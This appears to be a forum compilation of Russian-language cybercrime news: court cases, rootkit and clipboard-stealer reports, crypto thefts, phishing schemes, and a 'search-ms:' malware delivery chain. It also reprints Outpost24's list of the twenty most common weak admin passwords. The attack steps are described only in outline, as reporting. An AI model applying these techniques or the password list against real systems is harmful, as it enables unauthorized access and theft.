source: therecord.media/mondelez-and-zurich-reach-settlement-in-notpetya- cyberattack-insurance-suit/?web_view=true
Тюрьма для гендиректора
Генеральный директор российской ИТ-компании ГК «Цифра» Сергей Емельченков приговорен к заключению в колонии общего режима по статье о превышении должностных полномочий. Согласно решению суда, за решеткой топ-менеджер проведет 3,5 года. К моменту выхода материала приговор был оглашен, но в силу не вступил.
На вопрос CNews о дальнейших планах компании в отношении Емельченкова и занимаемой им должности в свете решения суда представители ГК «Цифра» ответили: «Совет директоров ГК «Цифра» на ближайшем заседании рассмотрит вопрос о назначении генерального директора в связи с досрочным прекращением полномочий Сергея Емельченкова».
Суд признал Емельченкова виновным в нарушении по ч. 3 ст. 286 УК РФ (превышение должностных полномочий с причинением тяжких последствий). Это преступление карается тюремным заключением на срок от трех до десяти лет, так что гендиректор ГК «Цифра» получил почти минимально возможное наказание.
Также, согласно решению суда, Емельченкову запрещено занимать руководящие должности, связанные с организационно-распорядительными, административно- хозяйственными функциями на госслужбе в течение двух с половиной лет. Первым на это обратил внимание Tadviser. Максимальный срок такого запрета по этой статье УК РФ – три года.
ГК «Цифра» – одна из крупнейших российских ИТ-компаний современности. В рейтинге «CNews300: Крупнейшие ИТ-компании России 2023» она заняла 73 место (годом ранее была на 77 строчке), получив совокупную выручку 7,282 млрд руб. – за год она выросла на 27,51%.
Что натворил Емельченков
Уголовное преследование Емельченкова, как сообщал CNews, началось в июле 2020 г. с его задержания. Спустя несколько дней он был отправлен под домашний арест – эта мера пресечения действовала до октября 2021 г.
Важно отметить, что руководителем ГК «Цифра» Емельченков стал, когда расследование еще не было завершено. Согласно ЕГРЮЛ, эту должность в компании он занимает с 9 августа 2022 г.
Под домашний арест Емельчекова поместил Чертановский райсуд Москвы, а в дальнейшем дело рассматривалось в Симоновском райсуде Москвы. Как пишет «Коммерсант», следствие полагает, что в период с февраля по октябрь 2018 г. Емельченков, который на тот момент находился на посту замгендиректора «Почты России» по информационным технологиям и развитию новых продуктов, «умышленно нарушили требования»» ФЗ №223 «О закупках товаров, работ, услуг отдельными видами юридических лиц». По данным следствия, Емельченков существенно скорректировал техзадания договоров, которые были заключены с компаниями с ООО «Сервионика», АО «Ай-Теко», ООО «Мэйкор-Сервис» и АО «Инфосистемы Джет».
Также, согласно материалам дела, Емельченков подписал с каждой из этих компаний допсоглашения о многократном сокращении штрафов за «ненадлежащее исполнение ранее заключенных договоров». Эти действия, по оценке стороны обвинения, нанесли «Почте России» ущерб в размере 1,58 млрд руб.
По этому делу вместе с Емельченковым проходит и его бывший коллега – Андрей Синичкин, который ранее занимал в «Почте России» должность главы департамента управления ИТ-сервисами. Синичкин по решению суда проведет три года в колонии общего режима и не сможет занимать руководящие посты два с половиной года. Виновным его признали по той же статье, что и Емельченкова – ч. 3 ст. 286 УК РФ.
Могло быть и хуже
Приговор Емельченкова мог оказаться существенно более суровым, если бы судья принял во внимание просьбу гособвинения. Оно запрашивало для него, равно как и для Синичкина, по пять с половиной лет лишения свободы.
Дополнительно обвинение просило взыскать с Синичкина и Емельченкова всю сумму нанесенного ими ущерба – 1,58 млрд руб. В приговоре суда об этом ничего не сказано.
Сергей Емельченков и Андрей Синичкин свою вину к моменту выхода материала не признавали
Часть срока уже позади
После оглашения приговора Синичкин и Емельченков были заключены под стражу вплоть до вступления приговора в силу. Все время, что они будут находиться под ней, будет засчитано в качестве части срока наказания – один день под стражей будет учтен как полтора дня в колонии.
Также Емельченкову, который на момент вынесения приговора находился под подпиской о невыезде (эта мера пресечения действовала с момента окончания домашнего ареста), учтут срок его пребывания под домашним арестом – с июля 2020 г. по октябрь 2021 г. Два дня домашнего ареста засчитают как один день лишения свободы.
Преступник был задержан и тут же выпущен под залог, обоснованы ли обвинения в его адрес?
Алехандро Као де Бенос, испанец из аристократической семьи, ставший одним из самых громких сторонников Северной Кореи на Западе, на днях был арестован в Испании. Де Бенос основал Ассоциацию дружбы с Кореей и активно выступал в поддержку режима Ким Чен Ына.
Он был задержан на вокзале в Мадриде, сообщают местные правоохранители. В заявлении его называют «беглецом». Не отрицается, что Де Бенос мог использовать фальшивые документы.
Арест связан с обвинениями в мошенничестве, выдвинутые США в апреле 2022 года. Как сообщается, в 2019 году Де Бенос участвовал в организации сомнительного рода криптоконференции в Пхеньяне.
Наряду с Де Беносом, США обвиняет также гражданина Великобритании Кристоферу Эммсу и американцуа Вирджилу Гриффиту. Все трое, по версии Министерства юстиции США, состояли в сговоре с целью нарушить санкции США против КНДР.
Как сообщается, западные участники конференции инструктировали представителей КНДР, как с помощью криптовалют обходить банковские ограничения и отмывать средства. Де Бенос с подельниками якобы даже планировали создать криптоинфраструктуру внутри Северной Кореи.
В соцсетях Де Бенос, который, по его словам , выпущен под залог, уже заявил о своей невиновности. Он считает, что обвинения сфабрикованы, чтобы добиться его экстрадиции в США. По мнению Де Беноса, Испания не может экстрадировать его только за нарушение американских санкций, поэтому и были выдвинуты дополнительные обвинения в мошенничестве.
В целом, как бы Де Бенос не отрицал обвинения, они могут оказаться вполне состоятельными. КНДР неоднократно обвиняли в краже миллиардов долларов в криптовалюте для финансирования ядерной программы. Совет Безопасности ООН принял уже множество резолюций, направленных на борьбу с созданием Пхеньяном оружия массового поражения.
Тем не менее, Северная Корея последовательно отрицает причастность к кибершпионажу и хищениям криптовалют, несмотря на доказательства, представленные экспертами ООН и американскими прокурорами.
В 2021 году минюст США обвинил троих хакеров из КНДР в краже и вымогательстве более 1,3 млрд долларов у финансовых организаций и криптобирж по всему миру. По версии следствия, они работали на военную разведку Северной Кореи и причастны ко многим кибератакам, включая взлом Sony Pictures и распространение вымогателя WannaCry.
Тогда помощник генпрокурора США Джон Демерс заявил: «Северокорейские хакеры, используя не оружие, а клавиатуры, крадут не мешки с деньгами, а цифровые кошельки с криптовалютой. Режим превратился в преступный синдикат с флагом, использующий госресурсы для краж сотен миллионов долларов».
В мае этого года Минфин США ввёл санкции против четырёх организаций, где предположительно работают тысячи хакеров из КНДР. По данным американских властей, они также генерируют доходы для финансирования ракетно-ядерной программы Пхеньяна.
source: policia.es/_es/comunicacion_prensa_detalle.php?ID=15982
С января по сентябрь 2023 года аналитики компании Outpost24 собирали интересную [статистику](https://outpost24.com/blog/it-admins-weak-password- use/) об аутентификационных данных. Оказалось, что ИТ-администраторы используют десятки тысяч слабых паролей, самым популярным из которых является «admin».
В общей сложности исследователи изучили более 1,8 млн учетных данных администраторов, полагаясь на решение для анализа угроз Threat Compass. Подчеркивается, что все данные были получены от вредоносного ПО, которое нацелено на приложения, хранящие имена пользователей и пароли. И хотя собранные данные были представлены не открытым текстом, исследователи объясняют, что большинство паролей в списке можно было легко угадать с помощью простейшего перебора.
«Чтобы сузить наш список только до паролей администраторов, мы изучили статистические данные, хранящихся в бэкэнде Threat Compass, ориентируясь на страницы, которые были идентифицированы как порталы администрирования. В общей сложности мы обнаружили 1,8 млн паролей, восстановленных в 2023 году (с января по сентябрь)», — гласит отчет Outpost24.
Click to expand...
Такие административные порталы могли предоставлять доступ к конфигурации, учетным записям и настройкам безопасности. Также через них можно, например, отслеживать клиентов и заказы, или получить доступ для выполнения CRUD- операций в БД.
Проанализировав полученную коллекцию аутентификационных данных для административных порталов, исследователи составили топ-20 самых слабых из них:
1. admin
2. 123456
3. 12345678
4. 1234
5. Password
6. 123
7. 12345
8. admin123
9. 123456789
10. adminisp
11. demo
12. root
13. 123123
14. admin@123
15. 123456aA@
16. 01031974
17. Admin@123
18. 111111
19. admin1234
20. admin1
Исследователи пишут, что хотя получившийся список «ограничен известными и предсказуемыми паролями», эти пароли были связаны со множеством релаьных порталов для администрирования. То есть, получается, что злоумышленники в целом неплохо подготовлены к атакам на привилегированных пользователей.
Эксперты подчеркивают, что защита корпоративной сети начинается с базовых принципов безопасности, включая использование длинных, надежных и уникальных паролей для каждой учетной записи, особенно когда речь идет о пользователях, которые имеют доступ к конфиденциальным ресурсам.
Комитет IETF (Internet Engineering Task Force), занимающийся развитием протоколов и архитектуры интернета, [утвердил](https://www.ietf.org/blog/mls- secure-and-usable-end-to-end-encryption/) публикацию стандарта MLS (Messaging Layer Security), определяющего протокол для организации сквозного шифрования в приложениях, выполняющих обмен сообщениями. Предполагается, что продвижение MLS позволит унифицировать механизмы сквозного шифрования сообщений в группах, охватывающих двух и более участников, и упростить внедрение их поддержки в приложения.
Для ознакомление опубликованы документы, описывающие [архитектуру](https://messaginglayersecurity.rocks/mls- architecture/draft-ietf-mls-architecture.html) MLS и применяемый для шифрования сообщений [протокол](https://messaginglayersecurity.rocks/mls- protocol/draft-ietf-mls-protocol.html). Реализации MLS развиваются на языках C++ (MLSpp, RingCentral), Go, TypeScript и Rust (OpenMLS, Wickr). При разработке MLS использован опыт уже существующих протоколов, применяемых для защиты передачи сообщений, таких как S/MIME, OpenPGP, Off the Record и Double Ratchet.
Процессы подготовки спецификации, рабочей реализации и процедур верификации ведутся параллельно, используя методы, применявшиеся при подготовке стандарта TLS 1.3. Подобный подход позволит к моменту готовности RFС уже иметь несколько совместимых и проверенных реализаций протокола. В настоящее время рабочие внедрения MLS уже применяются в коммуникационных платформах Webex и RingCentral, переход на MLS также планируют проекты Wickr и Matrix.
Основной целью создания нового протокола называется унификация средств для сквозного шифрования и внедрение единого стандартизированного и верифицированного протокола, который можно будет использовать вместо отдельных развиваемых разными производителями протоколов, решающих одни и те же задачи, но не совместимых между собой. MLS позволит использовать в разных приложениях уже проверенные готовые реализации протокола, а также организовать их совместное развитие и верификацию. Переносимость на уровне приложений планируется реализовать на уровне аутентификации, получения ключей и обеспечения конфиденциальности (совместимость на уровне транспорта и семантики выходит за рамки стандарта).
Решаемые протоколом задачи:
• Конфиденциальность - сообщения могут быть прочитаны только участниками группы.
• Гарантии целостности и аутентификации - каждое сообщение отправляется аутентифицированным отправителем и не может быть подменено или изменено по пути.
• Аутентификация членов группы - каждый участник может проверить достоверность других участников группы.
• Работа в асинхронном режиме - ключи шифрования могут быть выставлены без необходимости нахождения обоих участников в online.
• Прямая секретность (Forward Secrecy) - компрометация одного из участников не позволяет расшифровать ранее отправленные в группу сообщения.
• Защита после компрометации - компрометация одного из участников не позволяет расшифровать сообщения, которые будут отправлены в группу в будущем.
• Масштабируемость - по возможности сублинейная масштабируемость в плане потребления ресурсов в зависимости от размера группы.
Эксперты «Лаборатории Касперского» обнаружили редкую в наше время разновидность вредоносного ПО — [руткит Moriya](https://securelist.com/operation-tunnelsnake-and-moriya- rootkit/101831/). Дело в том, что после релиза Windows 10 безопасность ОС заметно усилилась, так что в последние годы разрабатывать и успешно использовать руткиты стало значительно сложнее.
Исследователи пишут, что Moriya предназначен для Windows и существует как минимум с 2018 года, просто до недавних пор руткит оставался незамеченным. По данным компании, за это время он использовался для весьма ограниченных и узконаправленных атак (пострадавших пока менее десятка). Наиболее заметными жертвами были две крупные региональные дипломатические организации в Юго- Восточной Азии и Африке, а остальные жертвы находились в странах Южной Азии.
Кто именно является создателем этого руткита неизвестно, но исследователи полагают, что за вредоносом стоит некая китайская кибершпионская группировка.
«Мы опираемся на тот факт, что объекты атак ранее уже подвергались атакам говорящих на китайском злоумышленников и, как правило, находятся в странах, которые часто становятся целями таких преступников. Кроме того, инструменты, использованные злоумышленниками, включая China Chopper, BOUNCER, Termite и Earthworm, являются дополнительным индикатором, подтверждающим нашу гипотезу, поскольку ранее они применялись в кампаниях, приписываемых известным китайским группам», — гласи отчет.
Click to expand...
Moriya оставался незамеченным столько лет, так как, например, он применяет хорошо известную тактику: внедряется между сетевым TCP/IP стеком Windows и входящим сетевым трафиком, а затем перехватывает пакеты данных еще до того, как они достигают операционной системы и любого установленного локально антивируса.
[](https://xakep.ru/wp- content/uploads/2021/05/347760/Operation_TunnelSnake_01.png)
Архитектура Moriya
Чтобы проникнуть в сеть интересующей их организации и установить Moriya, злоумышленники обычно компрометировали уязвимые веб-серверы IIS. К примеру, в одной из подтвержденных атак точкой входа послужил сервер, где не было патча для старой уязвимости [CVE-2017-7269](https://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2017-7269). Эксплуатируя этот баг, злоумышленники усыновили на сервер веб-шелл, а затем использовали его для развертывания Moriya.
Источник: xakep.ru/2021/05/07/moriya/
Эксперты Avast обнаружили инструмент для кражи криптовалюты HackBoss, который распространяется в Telegram под видом бесплатной малвари для начинающих. Создатели HackBoss уже похитили более 500 000 долларов у «начинающих хакеров», которые попались на эту уловку.
В основном HackBoss маскируется под бесплатные инструменты для взлома: чаще всего, это подбор паролей от учетных записей банков, сайтов знакомств и социальных сетей. При этом каждый рекламный пост сопровождается детальным описанием фальшивки, чтобы предложение выглядело правдоподобно.
В Telegram-канале HackBoss ежемесячно публикуется около девяти таких сообщений, каждое с более чем 1300 просмотров, а число подписчиков канала уже превышает 2800 человек (по данным Telemetrio).
Малварь упакована в архив .ZIP с исполняемым файлом внутри, который запускает простой пользовательский интерфейс. Независимо от доступных опций, единственная цель вредоноса: расшифровать и запустить в системе жертвы малварь для кражи криптовалюты. Это происходит при нажатии любой кнопки фейкового интерфейса. Также это может обеспечить устойчивое присутствие HackBoss в системе: для этого вносятся изменения в реестр или добавляется запланированное задание, которое запускает пейлоад каждую минуту.
«Если вредоносный процесс завершен (например, с помощью Диспетчера задач) он может снова запуститься при старте системы или запланированной задачи в следующую минуту», — пишут эксперты.
Click to expand...
Функциональность малвари проста: она проверяет буфера обмена и ищет там данные криптовалютных кошельков, затем подменяя их на кошельки, принадлежащие злоумышленниками. Таким образом, если жертва совершает платеж в криптовалюте и копирует кошелек получателя, HackBoss подменяет его в буфере, так как редкие пользователи проверяют эту строку перед нажатием кнопки оплаты.
Аналитикам Avast удалось обнаружить более 100 адресов криптовалютных кошельков, связанных HackBoss, на которые с ноября 2018 года было переведено более 560 000 долларов в различных криптовалютах. Сообщается, что не все средства были добыты малварь для кражи криптовалюты, поскольку некоторые кошельки оказались связаны с другим мошенничеством, в рамках которого жертвы покупали различное поддельное ПО.
Исследователи пишут, что авторы HackBoss продвигают свои поддельные хакерские инструменты и за пределами Telegram, хотя мессенджер остается основным каналом распространения. К примеру, у хакеров есть блог (cranhan.blogspot[.]com), где рекламируются поддельные инструменты и публикуются промовидео, а также реклама малвари размещается на публичных форумах.
Полный список индикаторов компрометации доступен на странице GitHub компании.
Источник: xakep.ru/2021/04/16/hackboss/
Издание The Record пишет, что, по данным Whale Alert и BTCparsers, биткоины, похищенные в 2016 году у биржи Bitfinex, были переведены в другие кошельки десятками транзакций в диапазоне от 1 до 1200 биткоинов за раз.
При этом пришедшие в движение средства составляют лишь около 10% от суммы, украденной у Bitfinex, ведь тогда хакеры похитили 119 756 BTC. Дело в том, что в 2016 году ущерб оценивался в примерно в 67 000 000 долларов США, но с тех пор курс биткоина значительно изменился, и теперь похищенная криптовалюта стоит уже 7 411 135 986 долларов.
Ранее эти средства и не обналичивались и не конвертировались, так как после взлома Bitfinex другие биржи занесли в черный список адреса злоумышленников, не позволяя им проводить операции с украденными биткоинами. В итоге деньги так и лежали в кошельках хакеров, а этот взлом все еще считается самым крупным в истории.
«Тот факт, что все эти транзакции были проведены одновременно, тысячи отдельных транзакций на неизвестные кошельки, это очень подозрительно. Непонятно, что именно делают хакеры, но они выбрали интересное время. Это произошло примерно в то время, когда Coinbase вышла на биржу NASDAQ, и всеобщее внимание было сосредоточено на этом», — рассказал изданию криптоаналитик и блоггер, известный как Mr. Whale.
Click to expand...
Некоторые эксперты, с которыми говорили журналисты, считают, что из-за случившегося эти средства практически невозможно обналичить, и теперь хакеры используют их, чтобы повлиять на курс биткоина к доллару США. Дело в том, что перемещение таких больших объемов средств обычно приводит к снижению курса. Похоже, план хакеров оказался успешным, так как вчера биткоин подешевел к доллару с 64 000 до 62 000 за один BTC.
Mr. Whale не согласен с такой оценкой ситуации:
«Учитывая, что многие биржи криптовалюты никак не регулируются, я уверен, хакеры найдут способ конвертировать [средства] в фиат и обналичить. Также ходят слухи, что они могут продать эти биткоины покупателю, желающему получить их по сниженной цене. Таким образом могут выиграть обе стороны».
Click to expand...
Также источники издания полагают, что движение средств вряд ли связано с деятельностью правоохранительных органов. «Эти средства были украдены настолько тщательно, что хакеров вряд ли поймают», — считает Mr. Whale.
Источник: xakep.ru/2021/04/16/bitfinex-money/
Проект DeFi ChainSwap подвергся взлому. Хакеры воспользовались критической уязвимостью в смарт-контракте проекта, получили доступ к кошельку и распродали токены на $8 млн.
Разработчики проекта подчеркнули, что уязвимости был подвержен только кошелек ChainSwap. Токены, находящиеся на кошельках пользователей, вне опасности. Они призвали пользователей не покупать украденные токены, так как планируют выпустить новую версию токена и распределить их среди держателей первой версии.
«Команда Chainswap приостановила работу кошелька на блокчейне BSC. Мы пытаемся вычислить кошелек хакера. Ваши балансы могут временно обнулиться, но только на время проверки. Взломан был смарт-контракт, но кошельки, взаимодействовавшие с Chaiswap не подвержены атаке», — написали разработчики проекта в Twitter.
Это уже второй взлом проекта ChainSwap с начала месяца. 2 июля хакеры вывели из пулов ликвидности ChainSwap около $800 000. Но разработчики обещали вернуть пользователям потерянные средства.
Уроженец Луганской области, ныне проживающий в Харькове, осужден за мошеннические действия, совершенные в составе группы лиц (ч. 2 ст. 190 УКУ). Относительно деталей преступления, совершенного в ноябре 2020 года, в материалах судебного производства говорится следующее.
Получив через интернет в свое распоряжение базу пользователей российского «ПромсвязьБанка», мужчина занимался тем, что обзванивал клиентов по мобильной связи и выдавал себя за менеджера данной организации.
В указанный срок (ноябрь 2020), мошенник, находясь в арендованном офисе, позвонил одному из клиентов «ПромсвязьБанка», находящемуся в Российской Федерации, представился сотрудником банка и сообщил клиенту, что неизвестные мошенники оформили на его имя кредит в «ПочтаБанке» на 120 тысяч рублей.
Назвав все персональные данные клиента из базы, он убедил жертву, что является настоящим менеджером «ПромсвязьБанка» и предложил решение проблемы: беспроцентное погашение оформленного мошенниками кредита через «страхового партнера» – «ТинькоффБанк».
Жертва согласилась и перевела по указанным реквизитам на карту банка Тинькофф (российский виртуальный аналог украинского «Монобанка») 109 тысяч рублей. После этого мошенник прислал потерпевшему поддельную справку «ПочтаБанка» о полном погашении кредита и отсутствии задолженностей.
Следствие установило, что мошенник действовал не в одиночку, у него были пособники, однако на момент судебного заседания, их личности так и не были установлены. После того, как мошеннику предъявили обвинение, он полностью признал свою вину и согласился на упрощенное судебное производство в его отсутствие.
Учитывая добровольное признание вины и отсутствие прежних судимостей, суд счел возможным применить к обвиняемому легкую степень наказания в виде штрафа в размере 51 тысячи гривен (в то время, как статья предусматривает наказание до 3 лет лишения свободы).
Учитывая арендованный офис, в котором было совершено преступление, а также легкость, с которой обвиняемый признал вину и согласился на упрощенное судебное производство, данный эпизод, скорее всего не единственный, хотя и единственный раскрытый.
Свердловская полиция задержала группу, действовавшую под видом сайта BlaBlaCar.
Как рассказал начальник пресс-службы регионального гарнизона МВД Валерий Горелых, шестеро жителей Лесного в составе организованной группы действовали под предлогом оказания услуг перевозки на сайте попутчиков BlaBlaCar. В ходе обысков обнаружены и изъяты сотовые телефоны, жесткие диски, системные блоки, банковские карты и ноутбук, использовавшиеся для обмана граждан.
При допросе фигуранты дали признательные показания, заверив, что готовы возмещать причинённый людям материальный ущерб. До судебного разбирательства двум подозреваемым избрана мера пресечения в виде заключения под стражу, а остальным - подписка о невыезде и надлежащее поведение. Все шестеро - ранее не судимы и официально не трудоустроены.
"Организатор группы администрировал автоматизированное приложение (бот) в программе мгновенного обмена сообщениями, предназначенной для создания фишинговых ссылок на сайты, внешне схожих с оригинальными Интернет-ресурсами «Бла-бла-кар» и «Авито». Все это позволяло неправомерно получать платежные реквизиты банковских карт граждан, а также их денежные средства. Еще один задержанный привлек непосредственных исполнителей хищений, размещавших соответствующие объявления на оригинальном Интернет-ресурсе Бла-бла-кар, вступавших в коммуникацию с гражданами и направлявших им липовые ссылки на оплату. Кроме того, аферисты регистрировали доменные имена сайтов и осуществляли операции по переводу похищенных средств. Оперуполномоченные УБК ГУ МВД области установили 34 преступных эпизода. Всего от таких махинаций могли пострадать более 3 000 человек. Ведется совместное расследование органов полиции и СКР", - отметил полковник Горелых.
• Video:
https://t.me/TauNewsEkb/22150
Генеральная прокуратура направила в суд уголовное дело в отношении жителя столицы, которому инкриминировано хищение имущества путем модификации компьютерной информации, совершенное группой лиц по предварительному сговору в особо крупном размере.
Согласно материалам дела обвиняемый в 2007-2008 годах приобрел в сети Интернет реквизиты банковских платежных карточек иностранных граждан, незаконно использовал их для личных нужд, в результате чего похитил и пытался похитить денежные средства в сумме, превышающей тысячу базовых величин.
Обвиняемый скрылся от органа уголовного преследования, ввиду чего в 2011 году его объявили в розыск. После задержания на территории Российской Федерации он по просьбе Генеральной прокуратуры Республики Беларусь был выдан для осуществления уголовного преследования в марте текущего года.
Сроки давности привлечения обвиняемого к уголовной ответственности не истекли, поскольку их течение было прервано совершением нового умышленного преступления, а затем приостановлено в связи с тем, что он скрылся от правоохранителей.
Изучение материалов уголовного дела показало, что предварительное расследование по нему проведено всесторонне, полно и объективно, противоправные действия верно квалифицированы по ч.4 ст.212 Уголовного кодекса Республики Беларусь.
Мера пресечения в виде заключения под стражу применена правильно, оснований для ее изменения либо отмены не имеется.
• Source: https://prokuratura[.]gov.by/ru/media/novosti/nadzor-za-resheniyami- po-ugolovnym-i-grazhdanskim-delam/konstruktivnoe-mezhd031024/
Следственным управлением УСК по Гомельской области установлены обстоятельства незаконного предоставления доступа к банковским счетам.
Согласно материалам дела, житель Гомеля после окончания ВУЗа несколько лет не имел постоянного места работы. В период безденежья жил за счет матери и бабушки. Осенью 2021 года он нашел легкий способ подзаработать на оказании незаконных услуг. По просьбе виртуальных заказчиков из Telegram-каналов, парень открывал счета в банках, создавал личные кабинеты пользователя, сообщал данные для доступа, после чего получал вознаграждение. Несколько счетов зарегистрировал на имя своей матери.
За полтора года житель Гомеля открыл для чужого пользования 33 банковских счета.
Весной прошлого года фигурант откликнулся на поступившее в мессенджере предложение отмыть «грязные» деньги. Размер обещанного гонорара – половина выведенной суммы. Для принятия нечистых финансов он сбросил подельнику данные банковских карт матери, а для снятия денег в банкомате использовал карточку соседа. Всего обвиняемый обработал четыре транша.
Как выяснилось позднее, «транзитные» деньги изначально принадлежали четверым жителям Минска, которые стали жертвами мошенников. Потерпевшим со взломанных аккаунтов знакомых поступили сообщения с просьбой перевести на карточку деньги в долг. Они не посчитали нужным сделать уточняющий звонок, и зачислили просимую сумму без проверки.
На основании собранных по делу доказательств 27-летнему жителю Гомеля предъявлено обвинение по ч.ч.1,2 ст.222 (совершенное из корыстных побуждений незаконное распространение аутентификационных данных, посредством которых возможно получение доступа к счетам, повторно) и ч.2 ст.209 (мошенничество, совершенное группой лиц) Уголовного кодекса Республики Беларусь.
[ https://www.reuters.com/technology/hackers-claim-have-unitedhealths-stolen- data-is-it-bluff-2024-04-09/ ](https://www.reuters.com/technology/hackers- claim-have-unitedhealths-stolen-data-is-it-bluff-2024-04-09/)
What do you think about this guys?
Code:Copy to clipboard
WASHINGTON, April 9 (Reuters) - A freshly formed hacking gang claims to have won access to a massive stash of data stolen from UnitedHealth Group (UNH.N), opens new tab, the largest U.S. health insurer, but with little evidence to go on it is not clear whether they are telling the truth.
Hackers walloped UnitedHealth in February, paralyzing billions of dollars worth of health insurance payments across the country. The ransomware gang "Blackcat" initially said on its website that it had stolen 8 terabytes of sensitive records - including medical insurance and health data - only to swiftly delete the statement without explanation.
The new group, "Ransomhub," told Reuters that a disgruntled affiliate of Blackcat gave the data to them after a botched ransomware payment allowed Blackcat's hackers to vanish with $22 million in bitcoin.
Ransomhub refused to provide any backing for their claim or identify the affiliate.
"We will not disclose any information," the hackers said in a chat.
UnitedHealth said it was aware of the claim and was continuing to work with authorities. The FBI did not immediately return a message.
UnitedHealth has stayed mum on whether it paid the cybercriminals, but a hacker forum posting - backed by forensic blockchain evidence - claimed that Blackcat had cheated an affiliated hacker or hacker group out of a $22 million ransom paid by UnitedHealth to help contain the breach.
Blackcat then pulled a disappearing act, falsely claiming to have been nabbed by law enforcement.
Ransomhub told Reuters the Blackcat affiliate has since handed the data to them for resale. It declined to answer further questions, saying the group was busy.
With so much intrigue already surrounding the hack, experts urged caution about the claim.
Analyst Brett Callow of cybersecurity company Emsisoft said he suspected Ransomhub's claim was true, but he cautioned that he was making "a very low confidence guess" and that the group could be trying out a scam.
Darren Williams, the chief executive of cybersecurity company BlackFog, said he had seen a couple of gangs recently try to boost their credibility by lying about what they had. He said the latest claim was "highly likely" a bluff.
Около 1 млн сим-карт могут быть заблокированы из-за неактуальных данных абонентов.
С августа Роскомнадзор требует от операторов связи отключать номера абонентов с неактуальными персональными данными (ПД). Об этом сообщили «Ведомостям» источники в двух операторах. Оператор должен уведомить абонента в течение трех дней после получения списка номеров от регулятора. Далее абоненту дается 15 дней, чтобы обновить информацию о себе на «Госуслугах», в приложении оператора или в салоне связи. Если этого не сделать, его номер будет заблокирован согласно закону «О связи».
Об уведомлениях абонентов знает и гендиректор Telecom Daily. Он говорит, что операторы «сейчас очень активно рассылают уведомления абонентам о необходимости подтвердить свои паспортные данные во избежание блокировки».
Речь идет о картах, которые раздаются без договора у метро, или корпоративных сим-карт, которые компании покупают для своих сотрудников.
Закон «О связи» требует от мобильного оператора проверять достоверность сведений об абоненте до начала оказания услуг, включая данные о конечных пользователях услуг, если сим-карты оформлены на юридических лиц и ИП. Это правило действует с 2018 года.
Оператор должен подтвердить ФИО клиента, дату рождения, данные паспорта. Такие данные могут быть предоставлены как лично (в салоне связи), так и через систему «Госуслуг» или другие госинформсистемы, пояснила преподаватель образовательной платформы Moscow Digital School.
Кроме того, летом 2021 года вступил в силу закон, который обязывает предпринимателей предоставлять сведения о конечных пользователях корпоративных сим-карт в ЕСИА. РКН может потребовать от оператора блокировки незарегистрированного номера.
«На Роскомнадзор возложена обязанность осуществлять мониторинг достоверности сведений об абонентах, внесенных операторами связи в свои базы данных. С этой целью ведомство разработало специальную информационную систему, которая в автоматическом режиме осуществляет мониторинг достоверности таких данных», – заявил представитель РКН. После подключения к системе операторы стали активнее приводить свои базы данных в порядок, отметил он.
«Операторы и РКН осуществляют взаимодействие в рамках установленной законом
процедуры подтверждения данных абонентов и пользователей номерами юрлиц и ИП,
– сообщил представитель «Билайна». – Законодательство обязывает нас
приостанавливать предоставление услуг связи, в том случае если данные о
клиенте устарели и не совпадают с актуальными»
По данным Telecom Daily, в России есть около 6,5–7 млн серых сим-карт, которые
можно купить без паспорта у уличных продавцов, например, на вокзалах. Но эта
цифра постепенно снижается, отмечает гендиректор компании. Два года назад
серых карт было около 11 млн. В компании считают, что абонентская база
«обеляется» благодаря работе операторов. По их словам, из 7 млн серых карт не
более 5% – это карты, купленные для противоправных действий. Большинство таких
сим-карт – это корпоративные карты, которые не были правильно оформлены, или
«запасные» сим-карты, купленные для регистрации на интернет-сервисах, чтобы
избежать спама, подвел итог эксперт.
В апреле 2023 года операторы уже начали рассылать абонентам уведомления с просьбой подтвердить свои ПД в салоне связи или в личном кабинете «Госуслуг». Но до начала августа регулятор не требовал блокировать номера, говорят источники в операторах.
По словам одного из источников, в каждом запросе от РКН есть около 50 000 номеров. Если их владельцы не подтвердят свои данные, то к середине месяца операторам большой четверки придется заблокировать около 1 млн сим-карт.
В среднем каждый абонент приносит оператору около 320–340 руб. в месяц. Исходя из этого, единовременные потери операторов от блокировки сим-карт, чьи данные паспорта не актуализированы, могут быть от 100 млн до 360 млн руб. в месяц.
Проверку номеров абонентов делает подведомственный РКН Главный радиочастотный центр (ГРЧЦ). Он сравнивает данные об абонентах, предоставленные операторами, с базой данных, полученной от МВД. «Если соответствующая запись не нашлась, или паспорт был утерян, или же данные оказались неполными, РКН делает запрос оператору, а тот – абоненту, и ему на уточнение дается 15 дней», – пояснил источник. Если же данные по номеру не были подтверждены, номер блокируется оператором. Он должен сообщить об этом органам РКН. Те, в свою очередь, делают на него контрольный прозвон для проверки блокировки, говорит собеседник.
Если абонент не подтвердил данные, услуги связи отключаются, а договор может быть расторгнут оператором односторонне, добавил представитель «Билайна». Таким образом, абонент может потерять свой номер телефона, если после расторжения контракта его займет кто-то другой.
Гендиректор Telecom Daily не думает, что абоненты массово останутся без связи. Он считает, что это может коснуться только небольшого числа абонентов, в основном пожилых людей, которые не могут прийти в салоны связи или сделать все операции через интернет.
JavaScript-сценарий из браузера заманивает пользователей в хитроумную ловушку.
Эксперты в области кибербезопасности обнаружили, что злоумышленники используют
легитимную функцию поиска в Windows для тайной загрузки вредоносных программ
на компьютер своих жертв. Таким образом хакеры могут получить полный доступ к
системе и красть конфиденциальные данные.
По данным специалистов Trellix, преступники злонамеренно испльзуют протокол «search-ms:», который позволяет приложениям и ссылкам запускать локальный поиск на устройстве пользователя.
В своих атаках злоумышленники создают фишинговые письма с вредоносными ссылками или HTML-вложениями, которые перенаправляют жертву на заражённые сайты. Там активируется JavaScript-код, использующий протокол «search-ms:» для поиска на удалённом сервере хакеров.
При клике на ссылку появляется запрос разрешения на открытие проводника Windows. Если пользователь его подтвердит, ему будут показаны якобы локальные результаты поиска — ярлыки на файлы PDF и другие привычные иконки.
JavaScript-запрос на запуск проводника
Однако на самом деле это удалённые вредоносные файлы, маскирующиеся под безопасные. Они отображаются прямо в проводнике Windows, поэтому пользователь не видит подвоха и запускает файл, думая, что он находится в его системе. Так незаметно запускается исполнение вредоносного ПО.
Вредоносный ярлык, запускающий сетевую библиотеку
При клике на ярлык выполняется зловредная DLL-библиотека через утилиту regsvr32.exe. А в альтернативном варианте атаки, также выявленными исследователями, ярлыки запускают PowerShell-скрипты, которые тайно скачивают дополнительные полезные нагрузки.
По итогу на компьютер жертвы устанавливается ПО для удалённого управления AsyncRAT или Remcos RAT, а хакеры получают полный контроль над системой, могут красть данные и продавать полученный доступ другим злоумышленникам.
